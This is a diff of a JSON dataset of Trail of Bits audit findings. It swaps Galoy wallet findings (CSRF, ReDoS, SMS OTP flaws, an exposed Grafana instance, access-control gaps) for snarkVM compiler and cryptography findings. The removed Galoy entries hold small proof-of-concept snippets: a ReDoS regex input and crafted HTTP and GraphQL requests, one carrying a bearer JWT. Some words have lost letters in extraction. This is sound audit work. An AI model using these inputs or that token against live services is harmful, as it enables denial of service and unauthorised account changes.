let (string, _) = tag( \":\" )(string)?; // Parse the plaintext from the string. let (string, plaintext) = Plaintext::parse(string)?; Figure 13.1: console/program/src/data/plaintext/parse.rs#L23-L34 fn parse_pair (string: &str ) -> ParserResult <(Identifier, Entry>)> { // Parse the whitespace and comments from the string. let (string, _) = Sanitizer::parse(string)?; // Parse the identifier from the string. let (string, identifier) = Identifier::parse(string)?; // Parse the \":\" from the string. let (string, _) = tag( \":\" )(string)?; // Parse the entry from the string. let (string, entry) = Entry::parse(string)?; Figure 13.2: console/program/src/data/record/parse_plaintext.rs#L23-L33 We also found that whitespaces before the comma symbol are not allowed: let (string, owner) = alt(( map(pair( Address::parse, tag( \".public\" ) ), |(owner, _)| Owner::Public(owner)), map(pair( Address::parse, tag( \".private\" ) ), |(owner, _)| { Owner::Private(Plaintext::from(Literal::Address(owner))) }), ))(string)?; // Parse the \",\" from the string. let (string, _) = tag( \",\" )(string)?; Figure 13.3: console/program/src/data/record/parse_plaintext.rs#L52-L60 Recommendations Short term, handle whitespace around marker tags (such as colon, commas, and brackets) uniformly. Consider implementing a generic pair parser that receives the expected value type parser instead of reimplementing it for each type. 14. Signature veries with di\u0000erent messages Severity: Informational Diculty: Low Type: Cryptography Finding ID: TOB-ALEOA-14 Target: console/account/src/signature/verify.rs", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "6. GraphQL queries may facilitate CSRF attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy applications /graphql endpoint handles queries sent via GET requests. It is impossible to pass state-changing mutations or subscriptions in GET requests, and authorized queries need the Authorization: Bearer header. However, if a state-changing GraphQL operation were mislabeled as a query (typically a non-state-changing request), the endpoint would be vulnerable to cross-site request forgery (CSRF) attacks. Exploit Scenario An attacker creates a malicious website with JavaScript code that sends requests to the /graphql endpoint (gure 6.1). When a user visits the website, the JavaScript code is executed in the users browser, changing the servers state.
Figure 6.1: In this proof-of-concept CSRF attack, the malicious website sends a request (the btcPriceList query) when the victim clicks Submit request. Recommendations Short term, disallow the use of the GET method to send queries, or enhance the CSRF protections for GET requests. Long term, identify all state-changing endpoints and ensure that they are protected by an authentication or anti-CSRF mechanism. Then implement tests for those endpoints. References Cross-Origin Resource Sharing, Mozilla documentation Cross-Site Request Forgery Prevention, OWASP Cheat Sheet Series", + "title": "15. Unchecked output length during ToFields conversion ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "When converting dierent types to vectors of Field elements, the codebase has checks to validate that the resulting Field vector has fewer than MAX_DATA_SIZE_IN_FIELDS elements. However, the StringType::to_fields function is missing this validation: impl ToFields for StringType { type Field = Field; /// Casts a string into a list of base fields. fn to_fields (& self ) -> Vec < Self ::Field> { // Convert the string bytes into bits, then chunk them into lists of size // `E::BaseField::size_in_data_bits()` and recover the base field element for each chunk. // (For advanced users: Chunk into CAPACITY bits and create a linear combination per chunk.) self .to_bits_le().chunks(E::BaseField::size_in_data_bits()).map(Field::from_bits_le) .collect() } } Figure 15.1: circuit/types/string/src/helpers/to_fields.rs#L20-L30 We also remark that other conversion functions, such as from_bits and to_bits , do not constraint the input or output length. Recommendations Short term, add checks to validate the Field vector length for the StringType::to_fields function. Determine if other output functions (e.g., to_bits ) should also enforce length constraints.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "7. Potential ReDoS risk ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The caseInsensitiveRegex function takes an input: string parameter and uses it to create a new RegExp object (gure 7.1). Users cannot currently control the input parameter (the regular expression) or the string; however, if users gain that ability as the code is developed, it may enable them to cause a regular expression denial of service (ReDoS) . 13 14 export const caseInsensitiveRegex = (input: string ) => { return new RegExp ( `^ ${ input } $` , \"i\" ) 15 } Figure 7.1: src/services/mongoose/users.ts#1315 37 const findByUsername = async ( 38 username: Username , 39 ): Promise => { 40 41 try { const result = await User.findOne( 42 { username: caseInsensitiveRegex (username) }, Figure 7.2: src/services/mongoose/accounts.ts#3742 Exploit Scenario An attacker registers an account with a specially crafted username (line 2, gure 7.3), which forms part of a regex. The attacker then nds a way to pass the malicious regex (line 1, gure 7.3) to the findByUsername function, causing a denial of service on a victims machine. 1 2 let test = caseInsensitiveRegex( \"(.*){1,32000}[bc]\" ) let s = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!\" 3 s.match(test) Figure 7.3: A proof of concept for the ReDoS vulnerability Recommendations Short term, ensure that input passed to the caseInsensitiveRegex function is properly validated and sanitized.", + "title": "16. 
Potential panic on ensure_console_and_circuit_registers_match ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The codebase implements the ensure_console_and_circuit_registers_match function, which validates that the values on the console and circuit registers match. The function uses zip_eq to iterate over the two register arrays, but does not check if these arrays have the same length, leading to a runtime error when they do not. pub fn ensure_console_and_circuit_registers_match (& self ) -> Result <()> { use circuit::Eject; for ((console_index, console_register), (circuit_index, circuit_register)) in self .console_registers.iter(). zip_eq (& self .circuit_registers) Figure 16.1: vm/compiler/src/process/registers/mod.rs This runtime error is currently not reachable since the ensure_console_and_circuit_registers_match function is called only in CallStack::Execute mode, and the number of stored registers match in this case: // Store the inputs. function.inputs().iter().map(|i| i.register()).zip_eq(request.inputs()).try_for_each(|(register, input)| { // If the circuit is in execute mode, then store the console input. if let CallStack::Execute(..) = registers.call_stack() { // Assign the console input to the register. registers.store( self , register, input.eject_value())?; } // Assign the circuit input to the register. registers.store_circuit( self , register, input.clone()) })?; Figure 16.2: vm/compiler/src/process/stack/execute.rs Recommendations Short term, add a check to validate that the number of circuit and console registers match on the ensure_console_and_circuit_registers_match function.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" ] }, { - "title": "8. Use of MD5 to generate unique GeeTest identiers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy application uses MD5 hashing to generate a unique identier during GeeTest service registration. MD5 is an insecure hash function and should never be used in a security-relevant context. 33 const register = async (): Promise => { 34 35 36 37 try { const gtLib = new GeetestLib(config.id, config.key) const digestmod = \"md5\" const params = { 38 digestmod, 39 client_type: \"native\" , 40 } 41 42 43 const bypasscache = await getBypassStatus() // not a cache let result if (bypasscache === \"success\" ) { 44 result = await gtLib.register(digestmod, params) Figure 8.1: src/services/geetest.ts#3344 Recommendations Short term, change the hash function used in the register function to a stronger algorithm that will not cause collisions, such as SHA-256. Long term, document all cryptographic algorithms used in the system, implement a policy governing their use, and create a plan for when and how to deprecate them.", + "title": "17. Reserved keyword list is missing owner ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The compiler veries that identiers are not part of a list of reserved keywords. However, the list of keywords is missing the owner keyword. This contrasts with the other record eld, gates , which is a reserved keyword. 
// Record \"record\" , \"gates\" , // Program Figure 17.1: vm/compiler/src/program/mod.rs Recommendations Short term, add owner to the list of reserved keywords.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "9. Reliance on SMS-based OTPs for authentication ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Galoys authentication process is heavily reliant on the delivery of one-time passwords (OTPs) over SMS. This authentication method contravenes best practices and should not be used in applications that handle nancial transactions or other sensitive operations. SMS-based OTP leaves users vulnerable to multiple attacks and is considered an unsafe authentication method. Several of the most common and eective attack scenarios are described below. Text messages received by a mobile device can be intercepted by rogue applications on the device. Many users blindly authorize untrusted third-party applications to access their mobile phones SMS databases; this means that a vulnerability in a third-party application could lead to the compromise and disclosure of the text messages on the device, including Galoys SMS OTP messages. Another common technique used to target mobile nance applications is the interception of notications on a device. Android operating systems, for instance, broadcast notications across applications by design; a rogue application could subscribe to those notications to access incoming text message notications. Attackers also target SMS-based two-factor authentication and OTP implementations through SIM swapping . In short, an attacker uses social engineering to gather information about the owner of a SIM card and then, impersonating its owner, requests a new SIM card from the telecom company. All calls and text messages will then be sent to the attacker, leaving the original owner of the number out of the loop. This approach has been used in many recent attacks against crypto wallet owners, leading to millions of dollars in losses. Recommendations Short term, avoid using SMS authentication as anything other than an optional way to validate an account holder's identity and prole information. Instead of SMS-based OTP, provide support for hardware-based two-factor authentication methods such as Yubikey tokens, or software-based time-based one-time password (TOTP) implementations such as Google Authenticator and Authy. References What is a Sim Swap? Denition and Related FAQs, Yubico", + "title": "18. Commit and hash instructions not matched against the opcode in check_instruction_opcode ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The check_instruction_opcode function validates that the opcode and instructions match for the Literal , Call , and Cast opcodes, but not for the Commit and Hash opcodes. Although there is partial code for this validation, it is commented out: Opcode::Commit(opcode) => { // Ensure the instruction belongs to the defined set. if ![ \"commit.bhp256\" , \"commit.bhp512\" , \"commit.bhp768\" , \"commit.bhp1024\" , \"commit.ped64\" , \"commit.ped128\" , ] .contains(&opcode) { bail!( \"Instruction '{instruction}' is not the opcode '{opcode}'.\" ); } // Ensure the instruction is the correct one. 
// match opcode { // \"commit.bhp256\" => ensure!( // matches!(instruction, Instruction::CommitBHP256(..)), // \"Instruction '{instruction}' is not the opcode '{opcode}'.\" // ), // } } Opcode::Hash(opcode) => { // Ensure the instruction belongs to the defined set. if ![ \"hash.bhp256\" , \"hash.bhp512\" , \"hash.bhp768\" , \"hash.bhp1024\" , \"hash.ped64\" , \"hash.ped128\" , \"hash.psd2\" , \"hash.psd4\" , \"hash.psd8\" , ] .contains(&opcode) { bail!( \"Instruction '{instruction}' is not the opcode '{opcode}'.\" ); } // Ensure the instruction is the correct one. // match opcode { // \"hash.bhp256\" => ensure!( // matches!(instruction, Instruction::HashBHP256(..)), // \"Instruction '{instruction}' is not the opcode '{opcode}'.\" // ), // } } Figure 18.1: vm/compiler/src/process/stack/helpers/insert.rs Recommendations Short term, add checks to validate that the opcode and instructions match for the Commit and Hash opcodes.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "10. Incorrect handling and implementation of SMS OTPs ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Users authenticate to the web panel by providing OTPs sent to them over SMS. We identied two issues in the OTP authentication implementation: 1. The generated OTPs are persistent because OTP expiration dates are calculated incorrectly. The Date.now() method returns the epoch time in milliseconds, whereas it is meant to return the time in seconds. 294 const PhoneCodeSchema = new Schema({ 295 created_at: { 296 297 type : Date , default: Date.now , 298 required: true , Figure 10.1: The default date value is expressed in milliseconds. ( src/services/mongoose/schema.ts#294298 ) 11 export const VALIDITY_TIME_CODE = ( 20 * 60 ) as Seconds Figure 10.2: The default validity period is expressed in seconds. ( src/config/index.ts#11 ) 49 50 51 const age = VALIDITY_TIME_CODE const validCode = await isCodeValid({ phone: phoneNumberValid , code, age }) if (validCode instanceof Error ) return validCode Figure 10.3: Validation of an OTPs age ( src/app/users/login.ts#4951 ) 18 }): Promise < true | RepositoryError> => { 19 20 21 const timestamp = Date .now() / 1000 - age try { const phoneCode = await PhoneCode.findOne({ 22 phone, 23 code, 24 created_at: { 25 $gte: timestamp , 26 }, Figure 10.4: The codebase validates the timestamp in seconds, while the default date is in milliseconds, as shown in gure 10.1. ( src/services/mongoose/phone-code.ts#1826 ) 2. The SMS OTPs are never discarded. When a new OTP is sent to a user, the old one remains valid regardless of its expiration time. A users existing OTP tokens also remain valid if the user manually logs out of a session, which should not be the case. Tests of the admin-panel and web-wallet code conrmed that all SMS OTPs generated for a given phone number remain valid in these cases. Exploit Scenario After executing a successful phishing attack against a user, an attacker is able to intercept an OTP sent to that user, gaining persistent access to the victim's account. The attacker will be able to use the code even when the victim logs out of the session or requests a new OTP. Recommendations Short term, limit the lifetime of OTPs to two minutes. 
Additionally, immediately invalidate an OTP, even an unexpired one, when any of the following events occur: The user logs out of a session The user requests a new OTP The OTP is used successfully The OTP reaches its expiration time The users account is locked for any reason (e.g., too many login attempts) References NIST best practices for implementing authentication tokens", + "title": "19. Incorrect validation of the number of operands ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The implementation of Literals::fmt and Literals::write_le do not correctly validate the number of operands in the operation. Instead of enforcing the exact number of arguments, the implementations only ensure that the number of operands is less than or equal to the expected number of operands: /// Writes the operation to a buffer. fn write_le (& self , mut writer: W ) -> IoResult <()> { // Ensure the number of operands is within the bounds. if NUM_OPERANDS > N::MAX_OPERANDS { return Err (error( format! ( \"The number of operands must be <= {}\" , N::MAX_OPERANDS))); } // Ensure the number of operands is correct. if self .operands.len() > NUM_OPERANDS { return Err (error( format! ( \"The number of operands must be {}\" , NUM_OPERANDS))); } Figure 19.1: vm/compiler/src/program/instruction/operation/literals.rs#L294-L303 Recommendations Short term, replace the if statement guard with self.operands.len() != NUM_OPERANDS in both the Literals::fmt and Literals::write_le functions.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "11. Vulnerable and outdated Node packages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "We used the yarn audit and snyk tools to audit the project dependencies and components for known vulnerabilities and outdated versions, respectively. The project uses many outdated packages with known security vulnerabilities ranging from critical to low severity. A list of vulnerable and outdated packages is included in appendix C . Vulnerabilities in packages imported by an application are not necessarily exploitable. In most cases, an aected method in a vulnerable package needs to be used in the right context to be exploitable. We manually reviewed the packages with high- or critical-severity vulnerabilities and did not nd any vulnerabilities that could be exploited in the Galoy application. However, that could change as the code is further developed. Exploit Scenario An attacker ngerprints one of Galoys components, identies an out-of-date package with a known vulnerability, and uses it in an exploit against the component. Recommendations Short term, update the outdated and vulnerable dependencies. Long term, integrate static analysis tools that can detect outdated and vulnerable libraries (such as the yarn audit and snyk tools) into the build and / or test pipeline. This will improve the system's security posture and help prevent the exploitation of project dependencies.", + "title": "20. Inconsistent and random compiler error message ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "When the compiler nds a type mismatch between arguments and expected parameters, it emits an error message containing a dierent integer each time the code is compiled. 
Figure 20.1 shows an Aleo program that, when compiled twice, shows two dierent error messages (shown in gure 20.2). The error message also states that u8 is invalid, but at the same time expecting u8 . program main.aleo; closure clo: input r0 as i8; input r1 as u8; pow r0 r1 into r2; output r2 as i8; function compute: input r0 as i8.private; input r1 as i8.public; call clo r0 r1 into r2; // r1 is i8 but the closure requires u8 output r2 as i8.private; Figure 20.1: Aleo program ~/Documents/aleo/foo (testnet3?) $ aleo build Compiling 'main.aleo'... Loaded universal setup (in 1537 ms) 'u8' is invalid : expected u8, found 124i8 ~/Documents/aleo/foo (testnet3?) $ aleo build Compiling 'main.aleo'... Loaded universal setup (in 1487 ms) 'u8' is invalid : expected u8, found -39i8 Figure 20.2: Two compilation results Figure 20.3 shows the check that validates that the types match and shows the error message containing the actual literal instead of literal.to_type() : Plaintext::Literal(literal, ..) => { // Ensure the literal type matches. match literal.to_type() == *literal_type { true => Ok (()), false => bail!( \"'{ plaintext_type }' is invalid: expected {literal_type}, found { literal }\" ), Figure 20.3: vm/compiler/src/process/stack/helpers/matches.rs#L204-L209 Recommendations Short term, clarify the error message by rephrasing it and presenting only the literal type instead of the full literal.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3902,149 +6610,139 @@ ] }, { - "title": "12. Outdated and internet-exposed Grafana instance ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Grafana admin panel is exposed over the internet. A management interface should not be exposed over the internet unless it is protected by a secondary authentication or access control mechanism; these mechanisms (e.g., IP address restrictions and VPN solutions) can mitigate the immediate risk to an application if it experiences a vulnerability. Moreover, the Grafana version deployed at grafana.freecorn.galoy.io is outdated and vulnerable to known security issues. Figure 12.1: The outdated Grafana version (8.2.1) with known security issues The version banner on the login page (gure 12.1) identies the version as v8.2.1 ( 88622d7f09 ). This version has multiple moderate- and high-risk vulnerabilities. One of them, a path traversal vulnerability ( CVE-2021-43798 ), could enable an unauthenticated attacker to read the contents of arbitrary les on the server. However, we could not exploit this issue, and the Galoy team suggested that the code might have been patched through an upstream software deployment. Time constraints prevented us from reviewing all Grafana instances for potential vulnerabilities. We reviewed only the grafana.freecorn.galoy.io instance, but the recommendations in this nding apply to all deployed instances. Exploit Scenario An attacker identies the name of a valid plugin installed and active on the instance. By using a specially crafted URL, the attacker can read the contents of any le on the server (as long as the Grafana process has permission to access the le). This enables the attacker to read sensitive conguration les and to engage in remote command execution on the server. Recommendations Short term, avoid exposing any Grafana instance over the internet, and restrict access to each instances management interface. This will make the remote exploitation of any issues much more challenging. 
Long term, to avoid known security issues, review all deployed instances and ensure that they have been updated to the latest version. Additionally, review the Grafana log les for any indication of the attack described in CVE-2021-43798, which has been exploited in the wild. References List of publicly known vulnerabilities aecting recent versions of Grafana", + "title": "21. Instruction add_* methods incorrectly compare maximum number of allowed instructions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "During function and closure parsing, the compiler collects input, regular, and output instructions into three dierent IndexSet s in the add_input , add_instruction , and add_output functions. All of these functions check that the current number of elements in their respective IndexSet does not exceed the maximum allowed number. However, the check is done before inserting the element in the set, allowing inserting in a set that is already at full capacity and creating a set with one element more than the maximum. Figure 21.1 shows the comparison between the current and the maximum number of allowed elements and the subsequent insertion, which is allowed even though the set could already be at full capacity. All add_input , add_instruction , and add_output functions for both the Function and Closure types present similar behavior. Note that although the number of input and output instructions is checked in other locations (e.g., on the add_closure or get_closure functions), the number of regular instructions is not checked there, allowing a function or a closure with 1 + N::MAX_INSTRUCTIONS . fn add_output (& mut self , output: Output ) -> Result <()> { // Ensure there are input statements and instructions in memory. ensure!(! self .inputs.is_empty(), \"Cannot add outputs before inputs have been added\" ); ensure!(! self .instructions.is_empty(), \"Cannot add outputs before instructions have been added\" ); // Ensure the maximum number of outputs has not been exceeded. ensure!( self .outputs.len() <= N::MAX_OUTPUTS , \"Cannot add more than {} outputs\" , N::MAX_OUTPUTS); // Insert the output statement. self .outputs.insert(output); Ok (()) } Figure 21.1: vm/compiler/src/program/function/mod.rs#L142-L153 Figure 21.1 shows another issue present only in the add_output functions (for both Function and Closure types): When an output instruction is inserted into the set, no check validates if this particular element is already in the set, replacing the previous element with the same key if present. This causes two output statements to be interpreted as a single one: program main.aleo; closure clo: input r0 as i8; input r1 as u8; pow r0 r1 into r2; output r2 as i8; output r2 as i8; function compute: input r0 as i8.private; input r1 as u8.public; call clo r0 r1 into r2 ; output r2 as i8.private; Figure 21.2: Test program Recommendations Short term, we recommend the following actions: Modify the checks to validate the maximum number of allowed instructions to prevent the o-by-one error. Validate if outputs are already present in the Function and Closure sets before inserting an output. Add checks to validate the maximum number of instructions in the get_closure , get_function , add_closure , and add_function functions.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "13. 
Incorrect processing of GET path parameter ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "If the value of the hidden path parameter in the GET request in figure 13.1 does not match the value in the appRoutesDef array, the request will cause an unhandled error (figure 13.2). The error occurs when the result of the serverRenderer function is undefined (line 21, figure 13.3), because the Invalid route path error is thrown in the call to the renderToStringWithData function (figure 13.4). GET /?path=aaaa HTTP/1.1 Host: localhost:3000 Figure 13.1: The HTTP request that triggers the error HTTP/1.1 500 Internal Server Error // (...) ReferenceError: /Users/md/work/web-wallet/views/index.ejs:8 6| 7| >> 8| <%- pageData.title %> 9| 10| /colors.css\" /> 11| \" /> pageData is not defined at eval (\"web-wallet/views/index.ejs\":12:17) at index (web-wallet/node_modules/ejs/lib/ejs.js:692:17) at tryHandleCache (web-wallet/node_modules/ejs/lib/ejs.js:272:36) at View.exports.renderFile [as engine] (web-wallet/node_modules/ejs/lib/ejs.js:489:10) at View.render (web-wallet/node_modules/express/lib/view.js:135:8) at tryRender (web-wallet/node_modules/express/lib/application.js:640:10) at Function.render (web-wallet/node_modules/express/lib/application.js:592:3) at ServerResponse.render (web-wallet/node_modules/express/lib/response.js:1017:7) at web-wallet/src/server/ssr-router.ts:24:18 Figure 13.2: The HTTP response that shows the unhandled error const vars = await serverRenderer(req)({ // undefined path: checkedRoutePath, }) return res.render(\"index\", vars) // called when vars is undefined Figure 13.3: src/server/ssr-router.ts#21-24 export const serverRenderer = (req: Request) => async ({ path, flowData, }: { path: RoutePath | AuthRoutePath flowData?: KratosFlowData }) => { try { // (...) const initialMarkup = await renderToStringWithData(App) // (...) }) } catch (err) { console.error(err) } Figure 13.4: src/renderers/server.tsx#10-82 Exploit Scenario An attacker finds a way to inject malicious code into the hidden path parameter. This results in an open redirect vulnerability, enabling the attacker to redirect a victim to a malicious website. Recommendations Short term, ensure that errors caused by an invalid path parameter value (one not included in the appRoutesDef whitelist) are handled correctly. A path parameter should not be processed if it is unused. Long term, use Burp Suite Professional with the Param Miner extension to scan the application for hidden parameters.", + "title": "22. Instances of unchecked zip_eq can cause runtime errors ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", "body": "The zip_eq operator requires that both iterators being zipped have the same length, and panics if they do not. In addition to the cases presented in TOB-ALEOA-5, we found one more instance where this should be checked: // Retrieve the interface and ensure it is defined in the program. let interface = stack.program().get_interface(&interface_name)?; // Initialize the interface members. let mut members = IndexMap::new(); for (member, (member_name, member_type)) in inputs.iter().
zip_eq(interface.members()) { Figure 22.1: compiler/src/program/instruction/operation/cast.rs#L92-L99 Additionally, we found uses of the zip operator that should be replaced by zip_eq, together with an associated check to validate the equal length of their iterators: /// Checks that the given operands matches the layout of the interface. The ordering of the operands matters. pub fn matches_interface(&self, stack: &Stack, operands: &[Operand], interface: &Interface) -> Result<()> { // Ensure the operands is not empty. if operands.is_empty() { bail!(\"Casting to an interface requires at least one operand\") } // Ensure the operand types match the interface. for (operand, (_, member_type)) in operands.iter().zip(interface.members()) { Figure 22.2: vm/compiler/src/process/register_types/matches.rs#L20-L27 for (operand, (_, entry_type)) in operands.iter().skip(2).zip(record_type.entries()) { Figure 22.3: vm/compiler/src/process/register_types/matches.rs#L106-L107 Exploit Scenario An incorrectly typed program causes the compiler to panic due to a mismatch between the number of arguments in a cast and the number of elements in the cast type. Recommendations Short term, add checks to validate the equal length of the iterators being zipped and replace the uses of zip with zip_eq together with the associated length validations.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: Low" ] }, { - "title": "14. Discrepancies in API and GUI access controls ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "Although the Web Wallet's graphical user interface (GUI) does not allow changes to a username (figure 14.1), they can be made through the GraphQL userUpdateUsername mutation (figure 14.2). Figure 14.1: The lock icon on the Settings page indicates that it is not possible to change a username. POST /graphql HTTP/2 Host: api.freecorn.galoy.io Content-Length: 345 Content-Type: application/json Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiI2MjI3ODYwMWJlOGViYWYxZWRmNDBhNDYiLCJuZXR3b3JrIjoibWFpbm5ldCIsImlhdCI6MTY0Njc1NzU4NX0.ed2dk9gMQh5DJXCPpitj5wq78n0gFnmulRp2KIXTVX0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Origin: https://wallet.freecorn.galoy.io { \"operationName\": \"userUpdateUsername\", \"variables\": { \"input\": { \"username\": \"aaaaaaaaaaaaaaa\" }}, \"query\": \"mutation userUpdateUsername($input: UserUpdateUsernameInput!) {\\n userUpdateUsername(input: $input) {\\n errors {\\n message\\n __typename\\n }\\n user {\\n id\\n username\\n __typename\\n }\\n __typename\\n }\\n}\" } HTTP/2 200 OK // (...) { \"data\": { \"userUpdateUsername\": { \"errors\": [], \"user\": { \"id\": \"04f01fb4-6328-5982-a39a-eeb027a2ceef\", \"username\": \"aaaaaaaaaaaaaaa\", \"__typename\": \"User\" }, \"__typename\": \"UserUpdateUsernamePayload\" }}} Figure 14.2: The HTTP request-response cycle that enables username changes Exploit Scenario An attacker finds a discrepancy in the access controls of the GUI and API and is then able to use a sensitive method that the attacker should not be able to access. Recommendations Short term, avoid relying on client-side access controls. If the business logic of a functionality needs to be blocked, the block should be enforced in the server-side code.
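As a sketch of finding 22's failure mode and the recommended guard, the following self-contained Rust example assumes the itertools crate (which provides the zip_eq used by snarkVM); the `cast_members` helper and its data are hypothetical. An explicit length comparison turns the would-be panic into a recoverable error, while keeping `zip_eq` rather than `zip` ensures that removing the check later would still fail loudly instead of silently truncating:

```rust
use itertools::Itertools; // assumed dependency: itertools

// Hypothetical stand-in for pairing cast operands with interface members.
fn cast_members(inputs: &[i64], member_types: &[&str]) -> Result<Vec<(i64, String)>, String> {
    // Validate lengths up front so zip_eq below can no longer panic.
    if inputs.len() != member_types.len() {
        return Err(format!(
            "cast expects {} operands, found {}",
            member_types.len(),
            inputs.len()
        ));
    }
    // zip_eq (not zip): if the guard above is ever removed, a length
    // mismatch still surfaces as a panic instead of dropped elements.
    Ok(inputs
        .iter()
        .zip_eq(member_types)
        .map(|(value, ty)| (*value, ty.to_string()))
        .collect())
}

fn main() {
    // Well-typed cast: two operands, two members.
    assert!(cast_members(&[1, 2], &["u8", "i8"]).is_ok());
    // Mistyped cast: recoverable error instead of a compiler panic.
    assert!(cast_members(&[1], &["u8", "i8"]).is_err());
}
```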
Long term, create an access control matrix for specific roles in the application and implement unit tests to ensure that appropriate access controls are enforced server-side.", + "title": "23. Hash functions lack domain separation ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", "body": "The BHP hash function takes as input a collection of booleans, and hashes them. This hash is used to commit to a Record, hashing together the bits of program_id, the record_name, and the record itself. However, no domain separation or input length is added to the hash, allowing a hash collision if a type's to_bits_le function returns variable-length arrays: impl Record> { /// Returns the record commitment. pub fn to_commitment(&self, program_id: &ProgramID, record_name: &Identifier) -> Result > { // Construct the input as `(program_id || record_name || record)`. let mut input = program_id.to_bits_le(); input.extend(record_name.to_bits_le()); input.extend(self.to_bits_le()); // Compute the BHP hash of the program record. N::hash_bhp1024(&input) } } Figure 23.1: console/program/src/data/record/to_commitment.rs#L19-L29 A similar situation is present in the hash_children function, which is used to compute hashes of two nodes in a Merkle tree: impl PathHash for BHP { type Hash = Field; /// Returns the hash of the given child nodes. fn hash_children(&self, left: &Self::Hash, right: &Self::Hash) -> Result<Self::Hash> { // Prepend the nodes with a `true` bit. let mut input = vec![true]; input.extend(left.to_bits_le()); input.extend(right.to_bits_le()); // Hash the input. Hash::hash(self, &input) } } Figure 23.2: circuit/collections/src/merkle_tree/helpers/path_hash.rs#L33-L47 If the implementations of the to_bits_le functions return variable-length arrays, it would be easy to create two different inputs that would result in the same hash. Recommendations Short term, either enforce that each type's to_bits_le function always returns fixed-length arrays or add the input length and domain separators to the elements to be hashed by the BHP hash function. This would prevent the hash collisions even if the to_bits_le functions were changed in the future.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "15. Cloud SQL does not require TLS connections ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "Terraform's declarative configuration file for the Cloud SQL instance does not indicate that PostgreSQL should enforce the use of Transport Layer Security (TLS) connections. Similarly, the Galoy solution does not use the Cloud SQL Auth proxy, which provides strong encryption and authentication using identity and access management. Because the database is exposed only in a virtual private cloud (VPC) network, this finding is of low severity. Exploit Scenario An attacker manages to eavesdrop on traffic in the VPC network. If one of the database clients is misconfigured, the attacker will be able to observe the database traffic in plaintext. Recommendations Short term, configure Cloud SQL to require the use of TLS, or use the Cloud SQL Auth proxy. Long term, integrate Terrascan or another automated analysis tool into the workflow to detect areas of improvement in the solution. References Configure SSL/TLS certificates, Cloud SQL documentation Connect from Google Kubernetes Engine, Cloud SQL documentation", + "title": "24.
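The collision described in finding 23 and the recommended length framing can be sketched in a few lines of std-only Rust (the `frame` helper and its 64-bit length prefix are illustrative choices, not snarkVM code). Prefixing every variable-length component with its length acts as a separator, so bits can no longer migrate between components without changing the hash input:

```rust
// Concatenation without framing: ([1], [0,1]) and ([1,0], [1]) are identical.
fn concat(components: &[&[bool]]) -> Vec<bool> {
    components.iter().flat_map(|bits| bits.iter().copied()).collect()
}

// Length-framed concatenation: each component is preceded by its length,
// encoded as 64 little-endian bits, so component boundaries are unambiguous.
fn frame(components: &[&[bool]]) -> Vec<bool> {
    let mut input = Vec::new();
    for bits in components {
        let len = bits.len() as u64;
        for i in 0..64 {
            input.push((len >> i) & 1 == 1);
        }
        input.extend_from_slice(bits);
    }
    input
}

fn main() {
    let a = [&[true][..], &[false, true][..]];
    let b = [&[true, false][..], &[true][..]];
    // The unframed inputs collide before hashing even begins...
    assert_eq!(concat(&a), concat(&b));
    // ...while the framed inputs differ, so their hashes differ too.
    assert_ne!(frame(&a), frame(&b));
}
```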
